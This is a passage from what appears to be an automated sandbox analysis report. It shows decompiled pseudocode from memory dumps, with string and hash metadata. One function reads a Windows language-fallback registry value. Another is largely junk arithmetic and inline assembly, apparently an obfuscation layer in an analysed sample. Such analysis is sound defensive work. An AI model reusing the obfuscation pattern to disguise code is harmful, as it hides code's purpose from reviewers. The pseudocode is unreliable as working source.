                                                                      				intOrPtr _v24;
                                                                      				char* _v28;
                                                                      				char _v32;
                                                                      				char _v36;
                                                                      				char _v44;
                                                                      				signed int _v48;
                                                                      				intOrPtr _v52;
                                                                      				void* _v56;
                                                                      				void* _v60;
                                                                      				char _v64;
                                                                      				void* _v68;
                                                                      				void* _v76;
                                                                      				void* _v84;
                                                                      				signed int _t59;
                                                                      				signed int _t74;
                                                                      				signed short* _t75;
                                                                      				signed int _t76;
                                                                      				signed short* _t78;
                                                                      				signed int _t83;
                                                                      				short* _t93;
                                                                      				signed short* _t94;
                                                                      				short* _t96;
                                                                      				void* _t97;
                                                                      				signed int _t99;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      
                                                                      				_t80 = __ecx;
                                                                      				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                                                      				_t96 = __edx;
                                                                      				_v44 = __edx;
                                                                      				_t78 = 0;
                                                                      				_v56 = 0;
                                                                      				if(__ecx == 0 || __edx == 0) {
                                                                      					L28:
                                                                      					_t97 = 0xc000000d;
                                                                      				} else {
                                                                      					_t93 = _a4;
                                                                      					if(_t93 == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					_t78 = E009FF358(__ecx, 0xac);
                                                                      					if(_t78 == 0) {
                                                                      						_t97 = 0xc0000017;
                                                                      						L6:
                                                                      						if(_v56 != 0) {
                                                                      							_push(_v56);
                                                                      							E00A395D0();
                                                                      						}
                                                                      						if(_t78 != 0) {
                                                                      							L00A177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                                                      						}
                                                                      						return _t97;
                                                                      					}
                                                                      					E00A3FA60(_t78, 0, 0x158);
                                                                      					_v48 = _v48 & 0x00000000;
                                                                      					_t102 = _t101 + 0xc;
                                                                      					 *_t96 = 0;
                                                                      					 *_t93 = 0;
                                                                      					E00A3BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                                                      					_v36 = 0x18;
                                                                      					_v28 =  &_v44;
                                                                      					_v64 = 0;
                                                                      					_push( &_v36);
                                                                      					_push(0x20019);
                                                                      					_v32 = 0;
                                                                      					_push( &_v64);
                                                                      					_v24 = 0x40;
                                                                      					_v20 = 0;
                                                                      					_v16 = 0;
                                                                      					_t97 = E00A39600();
                                                                      					if(_t97 < 0) {
                                                                      						goto L6;
                                                                      					}
                                                                      					E00A3BB40(0,  &_v36, L"InstallLanguageFallback");
                                                                      					_push(0);
                                                                      					_v48 = 4;
                                                                      					_t97 = L009FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                                                      					if(_t97 >= 0) {
                                                                      						if(_v52 != 1) {
                                                                      							L17:
                                                                      							_t97 = 0xc0000001;
                                                                      							goto L6;
                                                                      						}
                                                                      						_t59 =  *_t78 & 0x0000ffff;
                                                                      						_t94 = _t78;
                                                                      						_t83 = _t59;
                                                                      						if(_t59 == 0) {
                                                                      							L19:
                                                                      							if(_t83 == 0) {
                                                                      								L23:
                                                                      								E00A3BB40(_t83, _t102 + 0x24, _t78);
                                                                      								if(L00A043C0( &_v48,  &_v64) == 0) {
                                                                      									goto L17;
                                                                      								}
                                                                      								_t84 = _v48;
                                                                      								 *_v48 = _v56;
                                                                      								if( *_t94 != 0) {
                                                                      									E00A3BB40(_t84, _t102 + 0x24, _t94);
                                                                      									if(L00A043C0( &_v48,  &_v64) != 0) {
                                                                      										 *_a4 = _v56;
                                                                      									} else {
                                                                      										_t97 = 0xc0000001;
                                                                      										 *_v48 = 0;
                                                                      									}
                                                                      								}
                                                                      								goto L6;
                                                                      							}
                                                                      							_t83 = _t83 & 0x0000ffff;
                                                                      							while(_t83 == 0x20) {
                                                                      								_t94 =  &(_t94[1]);
                                                                      								_t74 =  *_t94 & 0x0000ffff;
                                                                      								_t83 = _t74;
                                                                      								if(_t74 != 0) {
                                                                      									continue;
                                                                      								}
                                                                      								goto L23;
                                                                      							}
                                                                      							goto L23;
                                                                      						} else {
                                                                      							goto L14;
                                                                      						}
                                                                      						while(1) {
                                                                      							L14:
                                                                      							_t27 =  &(_t94[1]); // 0x2
                                                                      							_t75 = _t27;
                                                                      							if(_t83 == 0x2c) {
                                                                      								break;
                                                                      							}
                                                                      							_t94 = _t75;
                                                                      							_t76 =  *_t94 & 0x0000ffff;
                                                                      							_t83 = _t76;
                                                                      							if(_t76 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      						 *_t94 = 0;
                                                                      						_t94 = _t75;
                                                                      						_t83 =  *_t75 & 0x0000ffff;
                                                                      						goto L19;
                                                                      					}
                                                                      				}
                                                                      			}































                                                                      0x00a554eb
                                                                      0x00a554eb
                                                                      0x00a554de
                                                                      0x00000000
                                                                      0x00a554bc
                                                                      0x00a55477
                                                                      0x00a5547a
                                                                      0x00a55480
                                                                      0x00a55483
                                                                      0x00a55486
                                                                      0x00a5548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a5548b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55447
                                                                      0x00a55447
                                                                      0x00a55447
                                                                      0x00a55447
                                                                      0x00a5544e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a55450
                                                                      0x00a55452
                                                                      0x00a55455
                                                                      0x00a5545a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00a5545c
                                                                      0x00a5546a
                                                                      0x00a5546d
                                                                      0x00a5546f
                                                                      0x00000000
                                                                      0x00a5546f
                                                                      0x009fe70f

                                                                      Strings
                                                                      • @, xrefs: 009FE6C0
                                                                      • InstallLanguageFallback, xrefs: 009FE6DB
                                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 009FE68C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                      • API String ID: 0-1757540487
                                                                      • Opcode ID: 6c9468758458dc6de0a94ed3669391be746a093735dbe08bf79cddd01114f9f5
                                                                      • Instruction ID: 5ca7575c24926f26c1871d8c97f67a84787a86b533e3c6bcf49d9b31298514ea
                                                                      • Opcode Fuzzy Hash: 6c9468758458dc6de0a94ed3669391be746a093735dbe08bf79cddd01114f9f5
                                                                      • Instruction Fuzzy Hash: E3518CB29083499BC714DF64C450ABBB3E9BF88715F05092EFA8597250EB34DD4887A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 31%
                                                                      			E0041B829(void* __eax, signed int __ecx, void* __edx, signed int __edi, void* __esi) {
                                                                      				signed int _t78;
                                                                      				signed int _t79;
                                                                      				signed int _t80;
                                                                      				signed int _t81;
                                                                      				void* _t83;
                                                                      				signed char _t86;
                                                                      				signed char _t89;
                                                                      				signed int _t101;
                                                                      				signed int _t104;
                                                                      				void* _t110;
                                                                      				signed char _t135;
                                                                      				signed char _t141;
                                                                      				void* _t144;
                                                                      				signed int _t171;
                                                                      				signed int _t175;
                                                                      				signed int _t176;
                                                                      				void* _t177;
                                                                      				signed int _t189;
                                                                      				intOrPtr _t190;
                                                                      				intOrPtr _t201;
                                                                      				intOrPtr _t211;
                                                                      				signed int _t213;
                                                                      				signed int _t215;
                                                                      				signed int _t217;
                                                                      				signed int _t218;
                                                                      				signed int _t219;
                                                                      				signed int _t221;
                                                                      				void* _t222;
                                                                      				signed int _t224;
                                                                      				signed int _t225;
                                                                      				signed int _t226;
                                                                      				void* _t230;
                                                                      				void* _t234;
                                                                      				void* _t262;
                                                                      
                                                                      				asm("sbb eax, 0x8f465ae7");
                                                                      				 *0x2646cbf2 =  *0x2646cbf2 << 0x37;
                                                                      				 *0x19e43268 =  *0x19e43268 ^ __edi;
                                                                      				_pop(_t225);
                                                                      				 *0x51c9a64 =  *0x51c9a64 ^ __ecx;
                                                                      				_t233 =  *0xf7e7d169 * 0x40ca;
                                                                      				 *0x5d054ba9 =  *0x5d054ba9 >> 0xf4;
                                                                      				asm("adc eax, 0x95b1482e");
                                                                      				asm("sbb [0x70dea7bb], ecx");
                                                                      				_t226 = _t225 |  *0x18b8860f;
                                                                      				asm("lodsd");
                                                                      				asm("adc [0x41ebb9da], esi");
                                                                      				 *0x33a6d182 =  *0x33a6d182 >> 0x7d;
                                                                      				_t155 = 0xc3edf7fd;
                                                                      				 *0xadfcf6e4 =  *0xadfcf6e4 + 0xc3edf7fd;
                                                                      				 *0x1717fff6 =  *0x1717fff6 << 0xce;
                                                                      				_t109 = 0x5b;
                                                                      				_t171 =  *0x2744d3a1;
                                                                      				_t133 =  *0xbf10c7ef;
                                                                      				 *0xbf10c7ef = __ecx;
                                                                      				asm("adc [0xaa13f02b], edx");
                                                                      				if(( *0x50f5812 &  *0xe5c58bd5) - 1 + 1 <= 0) {
                                                                      					_t233 =  *0x22938e7f * 0x3196;
                                                                      					if( *0x2b57f6b * 0xc22c > 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t226 =  *0x3d02857f * 0xe5c1;
                                                                      					asm("adc dh, [0xdf65dea8]");
                                                                      					 *0x91bf2ad9 =  *0x91bf2ad9 >> 0x77;
                                                                      					 *0xc396849a = _t233;
                                                                      					asm("sbb ebx, [0xa0d5c513]");
                                                                      					 *0x44dca31a =  *0x44dca31a << 0xae;
                                                                      					asm("sbb cl, [0xb0909fc6]");
                                                                      					asm("sbb ebp, 0xa0091d94");
                                                                      					_t109 = 0xba;
                                                                      					asm("cmpsw");
                                                                      					_pop(_t233);
                                                                      					 *0x7d35dbee =  *0x7d35dbee - (_t171 &  *0x64796926);
                                                                      					asm("rol byte [0x73a31104], 0xea");
                                                                      					 *0xcd6e9f29 =  *0xcd6e9f29 & _t133;
                                                                      					_pop(_t155);
                                                                      					asm("adc dl, [0x1834181c]");
                                                                      					asm("stosd");
                                                                      					 *0x3788408 =  *0x3788408 - 0xba;
                                                                      					if( *0x3788408 < 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("scasd");
                                                                      					asm("sbb edx, [0x2e9c7b25]");
                                                                      					_t155 = 0x34;
                                                                      					asm("sbb [0x641981e5], ah");
                                                                      					asm("sbb [0xb610cbd8], edx");
                                                                      					 *0x44bebd9 =  *0x44bebd9 & 0xb2687e8c;
                                                                      					 *0x7e71f405 =  *0x7e71f405 + 0xb2687e8c;
                                                                      					_t109 = 0xf2;
                                                                      					asm("ror dword [0x6553c405], 0x64");
                                                                      					_t233 = _t233 - 1 + 1;
                                                                      					 *0xab2c05f2 =  *0xab2c05f2 >> 0xae;
                                                                      					 *0x5f263b1 =  *0x5f263b1 & 0x00000034;
                                                                      					L1();
                                                                      					 *0x631405f2 =  *0x631405f2 ^ _t133;
                                                                      					if( *0x631405f2 >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("ror dword [0x5f24d73], 0x1f");
                                                                      					_t86 = 0xffffffffb2687e8d ^  *0x88555503;
                                                                      					 *0x3b040dfb =  *0x3b040dfb - _t233;
                                                                      					asm("rcl byte [0xd030b18], 0x4b");
                                                                      					_t226 = _t226 ^  *0xac9fcf05;
                                                                      					_pop(_t141);
                                                                      					 *0x7b7305f2 =  *0x7b7305f2 >> 0x63;
                                                                      					 *0x61a291be =  *0x61a291be >> 0x1b;
                                                                      					 *0xd9bb07f2 =  *0xd9bb07f2 ^ _t86;
                                                                      					 *0xe32a07b6 =  *0xe32a07b6 ^ 0x000000f2;
                                                                      					 *0x3cdad06f =  *0x3cdad06f & 0xb2687e8c;
                                                                      					_t109 = 0xa2;
                                                                      					 *0x53ae0707 =  *0x53ae0707 << 0xa4;
                                                                      					 *0xb644d7bf =  *0xf25d9792;
                                                                      					_t155 = ( *0x599904 -  *0x40d050a &  *0x263907b6) +  *0x9b177b87;
                                                                      					_t133 = _t141 & 0;
                                                                      					 *0x8ca6312 =  *0x8ca6312 >> 0xa7;
                                                                      					asm("sbb ebp, 0xf6e8bf25");
                                                                      					asm("adc edi, 0xca65b72f");
                                                                      					asm("rcl byte [0x6e675f08], 0xfb");
                                                                      					 *0x5814f9f3 = 0x70426d1f;
                                                                      					asm("rcl byte [0x72d08ca], 0xb5");
                                                                      					_t211 =  *0x9ca71db;
                                                                      					_push(0xc3edf7fd);
                                                                      					_t89 = _t86 + 0x00000001 | 0x1aea213d;
                                                                      					asm("cmpsb");
                                                                      					_t42 = _t233;
                                                                      					_t233 =  *0x9e1802b;
                                                                      					 *0x9e1802b = _t42;
                                                                      					if(0xb2687e8c >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_pop(_t233);
                                                                      					_t109 =  *0xe1680cb2;
                                                                      					 *0xe1680cb2 = 0xa2;
                                                                      					_t262 = _t211 -  *0x5cd5dd09;
                                                                      					if(_t262 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("adc [0x31ce9b7b], eax");
                                                                      					if(_t262 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_pop(_t230);
                                                                      					 *0x4f229ee1 =  *0x4f229ee1 >> 0xdf;
                                                                      					L1();
                                                                      					 *0x14e1ce8 = _t89;
                                                                      					_t144 = 0x5f263a3;
                                                                      					 *0xed7511ca =  *0xed7511ca << 0xdc;
                                                                      					 *0xfcb874e6 =  *0xfcb874e6 & _t89;
                                                                      					asm("ror byte [0xc3848fa0], 0x56");
                                                                      					 *0xcc39a381 = _t144 - 0x00000001 | 0x000000b1;
                                                                      					_pop(_t213);
                                                                      					asm("movsb");
                                                                      					asm("adc dh, 0xd0");
                                                                      					 *0x9dda421 = _t213;
                                                                      					asm("rol dword [0xfe65f8f], 0x11");
                                                                      					 *0x8de39204 =  *0x8de39204 >> 0xbb;
                                                                      					asm("adc [0x44ba0cb3], dh");
                                                                      					asm("sbb cl, [0xae8a45b2]");
                                                                      					asm("adc edi, 0xb8e41635");
                                                                      					 *0x1ac773c1 =  *0x1ac773c1 + ( *0xcc39a381 |  *0x2ca812ca) - 1;
                                                                      					asm("rol dword [0xc916b6ff], 0xdc");
                                                                      					asm("rcr dword [0x492a0ca3], 0xf1");
                                                                      					asm("adc ebx, [0x2693b1fb]");
                                                                      					_t215 =  *0x9dda421 &  *0xe99e2a6e;
                                                                      					_pop( *0x1955b43f);
                                                                      					asm("sbb esi, 0x1ccfdf2f");
                                                                      					asm("sbb esi, [0xac39aa6f]");
                                                                      					asm("ror dword [0xd5c54df1], 0xb3");
                                                                      					asm("movsw");
                                                                      					asm("sbb esp, [0xde4352ed]");
                                                                      					_t155 =  *0xcc9f2260 * 0x00003904 &  *0x185a7f0d;
                                                                      					asm("lodsb");
                                                                      					asm("adc [0x19d5a4d9], eax");
                                                                      					asm("adc ah, [0xd7a3661c]");
                                                                      					 *0xe4e92261 =  *0xe4e92261 & _t215;
                                                                      					 *0xd917805 =  *0xd917805 + _t215;
                                                                      					asm("adc al, [0x4620e3e7]");
                                                                      					_pop(_t133);
                                                                      					asm("rcr byte [0x2cbfe0b3], 0xe0");
                                                                      					 *0x6190322a =  *0x6190322a << 0xb7;
                                                                      					asm("adc ebx, [0x2d49de05]");
                                                                      					asm("rol dword [0xaeea04f8], 0x25");
                                                                      					 *0x8134c513 =  *0x8134c513 << 0xe3;
                                                                      					_pop(_t109);
                                                                      					 *0x9bebb294 =  *0x9bebb294 >> 0x3b;
                                                                      					_t189 =  *0x1ffe2f60 * 0xf9cd;
                                                                      					 *0xa4d5e139 =  *0xa4d5e139 ^ _t215;
                                                                      					asm("ror byte [0xcd56e4b3], 0xe2");
                                                                      					_t226 = _t230 - 0x00000001 ^  *0x10968cdf;
                                                                      					_t233 = 0xa36f8c6 +  *0x546b0d;
                                                                      					_t217 = _t215 - 0x72683d6d | 0x2982182b;
                                                                      					if(_t217 >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					 *0x9095f073 =  *0x9095f073 & _t155;
                                                                      					_t218 = _t217 &  *0x54e63e6e;
                                                                      					 *0xf5390e18 =  *0xf5390e18 & 0x00000014;
                                                                      					_t226 = _t226 ^  *0x33d49e0b;
                                                                      					 *0x4ed762c =  *0x4ed762c - 0x34;
                                                                      					 *0x3ccbc9bd =  *0x3ccbc9bd | _t189;
                                                                      					asm("ror dword [0x38adb411], 0xa3");
                                                                      					_t109 = (0x000000e2 &  *0x56d56335) - 0x34;
                                                                      					asm("rcr byte [0xec32f4b7], 0x2d");
                                                                      					 *0xc6bb19cf =  *0xc6bb19cf + 0x11111a99;
                                                                      					 *0x3c05dad3 =  *0x3c05dad3 ^ _t155;
                                                                      					_t233 =  *0x2d147c94;
                                                                      					_t155 = _t155 - 0x63484c9c;
                                                                      					asm("adc esp, 0xd1610ec");
                                                                      					asm("adc edi, [0xec3598bd]");
                                                                      					asm("ror dword [0xe6ee2617], 0x3f");
                                                                      					asm("sbb ecx, [0x73495616]");
                                                                      					if(0x11111a99 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t219 = _t218 ^ 0xf332907a;
                                                                      					_t226 = _t226 | 0x2bcfe78e;
                                                                      					_pop(_t190);
                                                                      					_t233 =  *0x84844683;
                                                                      					asm("sbb [0xbf22d562], eax");
                                                                      					asm("sbb esi, [0x991821f4]");
                                                                      					asm("rol byte [0x8f73ce2], 0x2");
                                                                      					 *0xb72747fa =  *0xb72747fa >> 0xef;
                                                                      					_t155 = _t155 &  *0xca5601c9;
                                                                      					asm("rol dword [0x28ff160d], 0x43");
                                                                      					asm("sbb [0x191646bc], ebp");
                                                                      					asm("rcl dword [0x31135999], 0x8b");
                                                                      					 *0x830f96f5 =  *0x830f96f5 ^ _t233;
                                                                      					asm("sbb dh, 0xb5");
                                                                      					asm("lodsd");
                                                                      					if( *0x830f96f5 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t226 = _t226 ^  *0xe0342fd4;
                                                                      					_t233 = _t233 |  *0x5978c9cd;
                                                                      					 *0x63c5ca1e = _t190;
                                                                      					_t155 = _t155 - 1;
                                                                      					_push(0x11111a99);
                                                                      					asm("rcr byte [0x5a34bf63], 0x72");
                                                                      					 *0xa45a179c =  *0xa45a179c + _t155;
                                                                      					asm("sbb cl, [0xa3d7ff04]");
                                                                      					_push( *0xf100fa3);
                                                                      					_t133 = _t133 &  *0x9721fe2c;
                                                                      					asm("sbb esp, [0x491fc107]");
                                                                      					asm("ror dword [0x3b9c3d8b], 0xf5");
                                                                      					if(_t133 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t226 = _t226 ^  *0xdb180c75;
                                                                      					 *0x7cff5ecf =  *0x7cff5ecf +  *0x510abe69 * 0x4ab7;
                                                                      					 *0x578927b0 =  *0x578927b0 ^ 0x000000e2;
                                                                      					 *0x5417e0c6 =  *0x5417e0c6 - 0x14;
                                                                      					asm("rol dword [0x3148cd92], 0x5a");
                                                                      					 *0x1fc75200 =  *0x1fc75200 - 0xe2;
                                                                      					asm("adc [0x8604bf0a], cl");
                                                                      					 *0x61da671e =  *0x61da671e + _t155;
                                                                      					_push(_t233);
                                                                      					_t221 = _t219 - 0xdaa00f3d &  *0x3b9c3d8b;
                                                                      					if(_t221 != 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t233 = 0xeae80d75;
                                                                      					_t155 = _t155 - 0x29c19503;
                                                                      					 *0x84256719 = 0xeae80d75;
                                                                      					asm("adc [0x19be309a], esi");
                                                                      					asm("sbb ecx, [0xb910753b]");
                                                                      					_t222 = _t221 + 0xc67fba93;
                                                                      					 *0x933aef17 =  *0x933aef17 << 0x34;
                                                                      					_t133 = 0xb6;
                                                                      					asm("sbb esp, [0x4b1161da]");
                                                                      					asm("adc edi, [0x770498a1]");
                                                                      					_t109 = _t109 ^ 0x000000a8;
                                                                      					 *0x557117e6 =  *0x557117e6 + 0x34;
                                                                      					asm("stosb");
                                                                      					if(0xb6 >=  *0x36aa15cf) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_pop(_t133);
                                                                      					_t109 = _t109 +  *0x3c49e2b + 1;
                                                                      					asm("sbb edx, [0x9f182c83]");
                                                                      					 *0x853cfe13 = 0xf2;
                                                                      					 *0x30ae912e =  *0x30ae912e >> 0x8a;
                                                                      					_pop(_t101);
                                                                      					if(_t222 !=  *0x94f70c6f) {
                                                                      						goto L1;
                                                                      					}
                                                                      					asm("rcl dword [0x7f0ced7a], 0x27");
                                                                      					_t133 = 0x8a;
                                                                      					asm("stosd");
                                                                      					asm("sbb esi, [0x12727c2b]");
                                                                      					asm("sbb ch, 0x12");
                                                                      					asm("adc cl, 0x8a");
                                                                      					asm("adc [0xa1154614], al");
                                                                      					 *0xbf4decbc =  *0xbf4decbc << 8;
                                                                      					 *0x12cac1d2 =  *0x12cac1d2 >> 0xf1;
                                                                      					 *0x8bb38ab3 =  *0x8bb38ab3 >> 0xc6;
                                                                      					_t104 = (_t101 ^ 0x842d1515) - 0xc8;
                                                                      					_push(0xb7);
                                                                      					_push(0xeae80d75);
                                                                      					 *0xea9f4be =  *0xea9f4be << 0xbb;
                                                                      					_t224 =  *0x46d6bf29 | 0x892cc71d;
                                                                      					_t155 = 0xb7;
                                                                      					 *0xb55ffa9d =  *0xb55ffa9d >> 0xd4;
                                                                      					_push( *0x3ca59991);
                                                                      					_t109 =  *0x8379c014;
                                                                      					 *0x8379c014 = 0xd;
                                                                      					 *0x5100f2fb =  *0x5100f2fb >> 0xe5;
                                                                      					if( *0xb55ffa9d >= 0) {
                                                                      						goto L1;
                                                                      					}
                                                                      					 *0x31937373 =  *0x31937373 ^ 0xeae80d75;
                                                                      					 *0xc8dc9031 =  *0xc8dc9031 + 0x8a;
                                                                      					 *0xda573036 = 0x9210b481;
                                                                      					asm("rcl dword [0x13ef4003], 0x62");
                                                                      					 *0x5976c0c0 =  *0x5976c0c0 << 0x38;
                                                                      					 *0x2284e71a =  *0x2284e71a ^ (0xb7 +  *0xbdef13ca |  *0x6a51b2be);
                                                                      					asm("scasb");
                                                                      					 *0xfdf56ea0 =  *0xfdf56ea0 >> 0x7b;
                                                                      					asm("adc ecx, 0x2b9e8bd9");
                                                                      					_push( *0x666c28c);
                                                                      					asm("adc esi, [0xe9b91d3]");
                                                                      					asm("adc dl, [0x291159a2]");
                                                                      					L1();
                                                                      					 *0x1e1309e8 =  *0x1e1309e8 << 0xbe;
                                                                      					_push(_t226 - 0x56961b68);
                                                                      					asm("lodsb");
                                                                      					 *0x3c35620f =  *0x3c35620f | _t224;
                                                                      					return (_t104 |  *0x69dc859a) +  *0xac5dbae7;
                                                                      				}
                                                                      				L1:
                                                                      				_push( *0x2fc73f09);
                                                                      				asm("rcl dword [0x417854f3], 0x68");
                                                                      				_push(_t133);
                                                                      				_t133 = _t133 &  *0x79b40de1;
                                                                      				_push( *0x6bc2ecb);
                                                                      				asm("rcl dword [0xfa2f8e6e], 0x6");
                                                                      				asm("rol dword [0xc597d0f], 0xf");
                                                                      				_t201 =  *0x938fa7df;
                                                                      				asm("adc ecx, 0x329b57fa");
                                                                      				if(_t133 >= 0) {
                                                                      					 *0x8a685578 =  *0x8a685578 + _t201;
                                                                      					 *0x84a21108 =  *0x84a21108 - _t109;
                                                                      					if( *0x84a21108 == 0) {
                                                                      						asm("rcr byte [0xb1ea05ca], 0x29");
                                                                      						asm("adc ah, [0x88d74ee6]");
                                                                      						_pop(_t135);
                                                                      						 *0xf3576913 =  *0xf3576913 ^ _t135;
                                                                      						asm("rol byte [0xf75e22b2], 0x78");
                                                                      						asm("adc ebx, [0xec0cb267]");
                                                                      						_t110 = _t109 + 0x10;
                                                                      						 *0x9904b26f = 0xdf24103;
                                                                      						asm("cmpsw");
                                                                      						asm("rcr dword [0x28cad8f5], 0xc2");
                                                                      						 *0xa61f20c =  *0x9904b26f;
                                                                      						 *0xd2cb6bf7 =  *0xd2cb6bf7 - _t201;
                                                                      						asm("sbb esi, [0x55094f61]");
                                                                      						_t133 = (_t135 &  *0xf0976124 | 0x263c72ed) - 0xe3;
                                                                      						asm("adc [0x79efa9b6], ah");
                                                                      						_t78 =  *0xa61f20c &  *0x5e1aa64;
                                                                      						asm("sbb [0x528c0af2], bl");
                                                                      						_push(_t110);
                                                                      						_t155 = _t155 -  *0x737811df;
                                                                      						asm("rcl byte [0x5c0a4f30], 0xbd");
                                                                      						asm("sbb [0x886b48db], ecx");
                                                                      						_t109 = _t110 + 1 - 0xa8;
                                                                      						_push(_t155);
                                                                      						asm("sbb [0xc12442c8], ebx");
                                                                      						 *0x389651f4 =  *0x389651f4 ^  *0x4f314760 * 0x00005e0f;
                                                                      						if( *0x389651f4 == 0) {
                                                                      							asm("rcl byte [0xbe53561c], 0x3f");
                                                                      							asm("sbb [0xd228f6cd], edx");
                                                                      							 *0x5a49d6e2 =  *0x5a49d6e2 + _t109;
                                                                      							asm("adc bl, 0xa8");
                                                                      							asm("rol dword [0x6ac69135], 0xb9");
                                                                      							asm("adc bh, [0xde121eb1]");
                                                                      							asm("stosb");
                                                                      							asm("scasb");
                                                                      							_t234 = _t233 + 0x972558f4;
                                                                      							_push( *0xbf800b87);
                                                                      							asm("sbb esp, [0xa7c8f26]");
                                                                      							asm("sbb ebp, 0x1e463306");
                                                                      							asm("scasd");
                                                                      							_t79 = _t78 + 0xa;
                                                                      							 *0xba50f739 =  *0xba50f739 + _t234;
                                                                      							 *0x26717701 =  *0x26717701 >> 0x59;
                                                                      							_t233 = _t234 - 1;
                                                                      							asm("adc [0xdd24ebbc], eax");
                                                                      							 *0x1460419c =  *0x1460419c + _t233;
                                                                      							asm("sbb [0x6653f3f8], eax");
                                                                      							_t155 =  *0xb5169018;
                                                                      							asm("ror byte [0xf7b21810], 0xba");
                                                                      							_pop(_t175);
                                                                      							_t109 = (_t109 + 0xf8e86ed4 ^ 0x0000002c) -  *0x3250f267;
                                                                      							_t226 = _t226 -  *0xfcb988bd - 0x4c31203e -  *0xfb10f01f;
                                                                      							asm("adc ebx, [0x8530f9db]");
                                                                      							if(( *0x878838b9 & _t79) != 0) {
                                                                      								asm("sbb [0x979bc474], ebp");
                                                                      								_t176 = _t175 |  *0x6a3745f0;
                                                                      								_push( *0x32555021);
                                                                      								_t109 = _t109 - 1;
                                                                      								_t133 = _t133 -  *0xa156bda1;
                                                                      								asm("lodsd");
                                                                      								_t155 =  *0x6987d61b;
                                                                      								if(( *0x506514ee & _t176) < 0) {
                                                                      									_push(_t176);
                                                                      									asm("adc eax, [0x545ad0c5]");
                                                                      									 *0x56095dc5 =  *0x56095dc5 | _t226;
                                                                      									_t133 = _t133 -  *0x153c1bc6 ^  *0xdbb7991d;
                                                                      									asm("rol dword [0xe16db0fd], 0x44");
                                                                      									_t80 = _t79 -  *0x1ff74f0b;
                                                                      									_push( *0x11919b09);
                                                                      									 *0x41bd0e0b =  *0x41bd0e0b | _t233;
                                                                      									asm("rcr byte [0x3206c9a2], 0x7f");
                                                                      									_t109 = 0;
                                                                      									asm("sbb eax, [0xe11919b]");
                                                                      									asm("adc [0xe2aa090e], ebp");
                                                                      									 *0x990e3c8d =  *0x990e3c8d << 0x2e;
                                                                      									_t233 = _t233 -  *0x5e3d8981;
                                                                      									if(_t233 >= 0) {
                                                                      										_push( *0x317bab72);
                                                                      										 *0xb5b08232 =  *0xb5b08232 >> 0x63;
                                                                      										_t133 = _t133 &  *0x2455123c;
                                                                      										 *0x9b15e9b7 = _t80;
                                                                      										 *0x268ffb92 =  *0x268ffb92 & _t80;
                                                                      										_push(_t80);
                                                                      										_t81 = _t80 ^ 0x12a9fcfc;
                                                                      										asm("rcr byte [0x698370e1], 0x6b");
                                                                      										if(_t81 == 0) {
                                                                      											 *0x578ac775 = _t233;
                                                                      											_push(0);
                                                                      											_t177 = _t176 - 1;
                                                                      											 *0x77667382 =  *0x77667382 | _t155;
                                                                      											 *0x77eae00d =  *0x77eae00d - _t155;
                                                                      											asm("movsb");
                                                                      											_t109 =  *0x2e184135;
                                                                      											_t233 =  *0x578ac775 - 1;
                                                                      											_push( *0xe43a14c5);
                                                                      											 *0x61d2e428 =  *0x61d2e428 | _t81 - 0x000000b1;
                                                                      											_t133 =  *0x29bbf407;
                                                                      											if(0xffffffffffeb71d5 == 0) {
                                                                      												asm("ror dword [0x5b49775], 0xd9");
                                                                      												asm("sbb bl, 0x86");
                                                                      												_t109 = _t109 - 0x8c0ae168 &  *0x4f5bef25;
                                                                      												_t83 =  *0x47d38017;
                                                                      												 *0xc6e4fe87 =  *0xc6e4fe87 & _t155;
                                                                      												asm("sbb [0x171e1f9c], ecx");
                                                                      												 *0x1b1eab62 = _t177 - 0xfedc04fd;
                                                                      												asm("adc dl, 0xc9");
                                                                      												 *0x6451cdb3 =  *0x6451cdb3 + _t109;
                                                                      												_t133 = 0xce1bb28e;
                                                                      												_push(_t83);
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				goto L1;
                                                                      			}





































                                                                      0x0041bc50
                                                                      0x0041bc56
                                                                      0x0041bc5d
                                                                      0x0041bc65
                                                                      0x0041bc66
                                                                      0x0041bc6d
                                                                      0x0041bc77
                                                                      0x0041bc7e
                                                                      0x0041bc85
                                                                      0x0041bc91
                                                                      0x0041bc97
                                                                      0x0041bc9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bca3
                                                                      0x0041bca9
                                                                      0x0041bcb7
                                                                      0x0041bcbd
                                                                      0x0041bcc3
                                                                      0x0041bcc9
                                                                      0x0041bccf
                                                                      0x0041bcd6
                                                                      0x0041bce5
                                                                      0x0041bcec
                                                                      0x0041bcf2
                                                                      0x0041bcf8
